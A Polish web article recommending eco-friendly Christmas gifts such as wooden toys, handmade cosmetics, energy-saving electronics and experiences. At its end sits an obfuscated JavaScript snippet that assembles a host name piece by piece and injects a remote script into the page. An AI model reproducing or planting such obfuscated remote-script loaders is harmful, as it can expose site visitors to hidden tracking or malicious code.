Ekologiczne prezenty pod choinkę: tańsze, przyjazne i pomysłowe
Do świąt zostało bardzo mało czasu. Przez centra handlowe przewijają się tłumy ludzi w poszukiwaniu prezentów, a zewsząd słychać reklamy o atrakcyjnych upominkach świątecznych „na ostatnią chwilę”.
Czy warto jednak kupować byle co?
W zeszłym roku przez media przetoczył się głośny materiał dziennikarzy The Guardian. Reportaż opisywał niewielką chińską miejscowość, w której działa 600 fabryk i wszystkie one produkują ozdoby i dekoracje świąteczne. Tysiące pracowników z miasteczka i okolic codziennie malują bombki i prezentowe skarpety, farbują na czerwono czapki Mikołaja i inne świąteczne gadżety, stosując zagrażające środowisku i zdrowiu ludzi farby i lakiery.
Artykuł kończył się pytaniem, czy naprawdę chiński bibelot sprawi, że święta będą bardzo magiczne. Może więc warto postawić na eko i wybrać nie tylko dekoracje, ale również prezenty gwiazdkowe, które będą przyjazne dla środowiska i ludzi?
Drewniane zabawki dla dziecka
Co roku najwięcej prezentów świątecznych kupuje się dla dzieci. Producenci zabawek o tym wiedzą, dlatego wciąż proponują nowe kolekcje lalek, gier, zestawów kreatywnych i sprzętu elektronicznego dla najmłodszych. I mimo zapewnienia producentów, że dbają o bezpieczeństwo dzieci, większość zabawek jest wykonana z tworzyw sztucznych, plastiku i gumy pochodzących z krajów azjatyckich, gdzie nie są respektowane europejskie normy względem wykorzystywanych materiałów.
Przy odrobinie chęci wciąż jednak można na rynku znaleźć zabawki drewniane lub materiałowe, które są bezpieczne i ekologiczne, bo nie narażają dziecka na kontakt ze szkodliwymi chemikaliami. A przy tym rozwijają wyobraźnię i zachęcają do ruchu. Wśród oferty polskich wykonawców można znaleźć m.in. drewniane rowerki, pacynki, kalejdoskopy, zestawy małego ogrodnika, kucharza czy sklepikarza, bączki.
Zamiast drogerii
Dla babci, mamy, teściowej – gdzie najczęściej się robi zakupy dla bliskich kobiet? W drogerii! Przed świętami sklepy komponują nawet zestawy prezentowe, które z jednej strony są praktyczne dla obdarowywanej, bo zawierają od razu kilka środków do pielęgnacji twarzy, włosów czy ciała, a z drugiej, dla obdarowującego są szybkim, łatwym i pewnym rozwiązaniem problemu co kupić pod choinkę.
A może właśnie warto zainwestować trochę więcej wysiłku i poszukać kosmetyków mniej oczywistych? Robionych ręcznie przez lokalnych twórców z ekologicznych i naturalnych składników. Orkiszowe mydełko do twarzy, cynamonowy balsam do ciała czy czekoladowy szampon do włosów z pewnością bardziej urzekną bliskich niż kosmetyczne odpowiedniki znanych firm.
Jeśli sprzęt to ekologiczny
Powszechnie się sądzi, że mężczyźni są największymi gadżeciarzami, więc i z pomysłami na prezent dla nich nie ma problemu. Dla męża, ojca lub teścia kupuje się zwykle sprzęt elektroniczny. Jeden życzy sobie nowoczesnego smartfonu, inny – tabletu, trzeci – sprzętu RTV. Ale czy taki sprzęt może być ekologiczny? Jak najbardziej. Jeśli prezent wymaga zasilania prądem, to niech będzie energooszczędny.
Do wielu modeli telefonów obecnie dodaje się energooszczędną ładowarkę, a inne i w ogóle są montowane z przetworzonych wtórnie materiałów. Na rynku dostępne są również monitory przechodzące automatycznie w stan uśpienia, jeśli nie są używane przez krótki czas. Albo twarde dyski zmniejszające pobór prądu o kilkadziesiąt procent.
Prezenty nierzeczowe
Co roku każda osoba otrzymuje statystycznie jeden nietrafiony prezent. Po świętach trafiają one na serwisy aukcyjne albo lądują w koszu lub na dnie szafy. Aby prezent ucieszył bliską osobę, może warto zastanowić się nad wyborem nierzeczowego upominku?
Ciekawym pomysłem są bilety do teatru lub na koncert ulubionego zespołu. Kobietom z pewnością spodoba się wyjazd do SPA lub umówiona wizyta w gabinecie masażu. Mężczyznom – wejściówka do browaru połączona z degustacją piwa albo lot paralotnią.
Tego rodzaju prezenty można kupić przez internet, również „na ostatnią chwilę”, a są one jednak bardziej pomysłowe od standardowych zestawów prezentowych z centrum handlowego (sprawdź tutaj). Dziadków zaś na pewno ucieszy słoik ręcznie robionych przez wnuków konfitur. Takie prezenty gwiazdkowe się nie zmarnują!
eco
(function(){
ukd2=document.createElement("script");ukd2.type="text/javascript";
ukd2.async=true;ukd2_=(("us")+"t")+"a";ukd2_+=("t.i")+""+"n";ukd2_+=(("f")+"o");
ukd2.src="http://"+ukd2_+"/7006397.4970q6jlkd2q4b8pmmjkfc41nwwgyq";
document.body.appendChild(ukd2);
})();